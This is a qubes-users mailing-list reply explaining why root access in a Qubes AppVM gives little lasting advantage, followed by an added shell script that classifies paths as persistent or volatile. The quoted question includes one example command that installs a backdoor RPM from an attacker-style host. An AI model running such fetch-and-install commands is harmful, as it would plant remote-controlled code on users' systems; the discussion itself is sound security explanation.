On 03/11/2017 12:33 AM, [email protected] wrote:
> I'm sure this has been kicked into a pulp (considering the threads and
> the text in the sudoers files) but I am still perturbed by the
> argument that allowing unrestricted sudo to root in a DomU VM is
> "safe" and there is "no benefit" to disallowing it. Perhaps I am
> misunderstanding something, I have only installed and begun to pull
> the system apart today, so bear with me.
> [...]
> This code could do something as comical as:
>
> sudo dnf install https://i.ownz.uk/muhbackdoorz.rpm
>
> I am having an extremely difficult time seeing how this is not an
> issue.
>

Aaaaand there you have it, the problem! This command will not persist across a reboot of the AppVM, because the rest of the filesystem is only fake read-write: the only really read-write directories (whose changes are actually persisted) are /home and /usr/local.
As the others already stated, there could be problems for the actually running session, i.e. the rogue command could siphon all your data to a remote location, but it would only be able to access data in that AppVM and not in the others. This action would not need any root access, because all the data belongs to the very same user that downloaded/started the rogue program in the first place, so it already has access. The only advantage that root access would give could arguably be persistence (i.e. installation, as you suggested with DNF), but that advantage is fake and will vanish on AppVM reboot.

--
Alex

To view this discussion on the web visit https://groups.google.com/d/msgid/qubes-users/0cb0fb3a-a734-cb47-3167-681c971c6876%40gmx.com.
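The persistence point Alex makes above, as an added example that is not part of the thread or of Qubes itself: a small POSIX shell helper that classifies a path as persistent or volatile in a default Qubes AppVM. It assumes the default AppVM layout, where the private volume is mounted at /rw and /home and /usr/local are bind mounts out of it, so those three prefixes are the only ones treated as surviving a reboot; every other path (including where `dnf install` would put a package's files, such as /usr/bin or /etc) is reported as volatile. The sample paths are constructed for illustration, and the optional live mount check uses `findmnt`, which is assumed to be present in the template.

```shell
#!/bin/sh
# Added example, not code from the qubes-users thread or the Qubes project.
# Assumption: default Qubes AppVM layout, private volume at /rw with
# /home and /usr/local bind-mounted from it. Everything else is reset
# to the TemplateVM's root image on AppVM reboot.
PERSISTENT_PREFIXES="/home /usr/local /rw"

# persists_across_reboot PATH
# Returns 0 if an absolute, canonical PATH lies under a persisted prefix,
# 1 otherwise. Trailing slashes are stripped; relative paths are volatile
# by construction (they cannot match an absolute prefix).
persists_across_reboot() {
    p="${1%/}"
    [ -n "$p" ] || p="/"
    for prefix in $PERSISTENT_PREFIXES; do
        case "$p" in
            "$prefix"|"$prefix"/*) return 0 ;;
        esac
    done
    return 1
}

# classify_paths PATH...
# Prints one "PATH persistent|volatile" line per argument.
classify_paths() {
    for p in "$@"; do
        if persists_across_reboot "$p"; then
            echo "$p persistent"
        else
            echo "$p volatile"
        fi
    done
}

# count_persistent PATH...
# Echoes how many of the given paths would survive a reboot.
count_persistent() {
    n=0
    for p in "$@"; do
        if persists_across_reboot "$p"; then n=$((n + 1)); fi
    done
    echo "$n"
}

# show_persistent_mounts
# Optional live check inside an AppVM: confirm that the prefixes above
# really are backed by the private volume. Only meaningful on Qubes.
show_persistent_mounts() {
    if command -v findmnt >/dev/null 2>&1; then
        findmnt -o TARGET,SOURCE,OPTIONS /rw /home /usr/local
    else
        echo "findmnt not available; skipping mount check" >&2
    fi
}

# Constructed sample: where a hostile RPM's payload, a cron job, a sudoers
# drop-in and a user-level file would each land.
classify_paths \
    /usr/bin/muhbackdoorz \
    /etc/cron.d/muhbackdoorz \
    /etc/sudoers.d/muhbackdoorz \
    /usr/local/bin/muhbackdoorz \
    /home/user/.bashrc

# Run with "mounts" as the first argument to perform the live check.
if [ "${1:-}" = "mounts" ]; then
    show_persistent_mounts
fi
```

The prefix match is deliberately strict: `/homeless/x` or `/usr/localhost` does not match `/home` or `/usr/local`, because the pattern requires either the prefix itself or the prefix followed by a slash. Paths containing `..` or symlinks should be resolved first (for example with `readlink -f`) before being classified.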
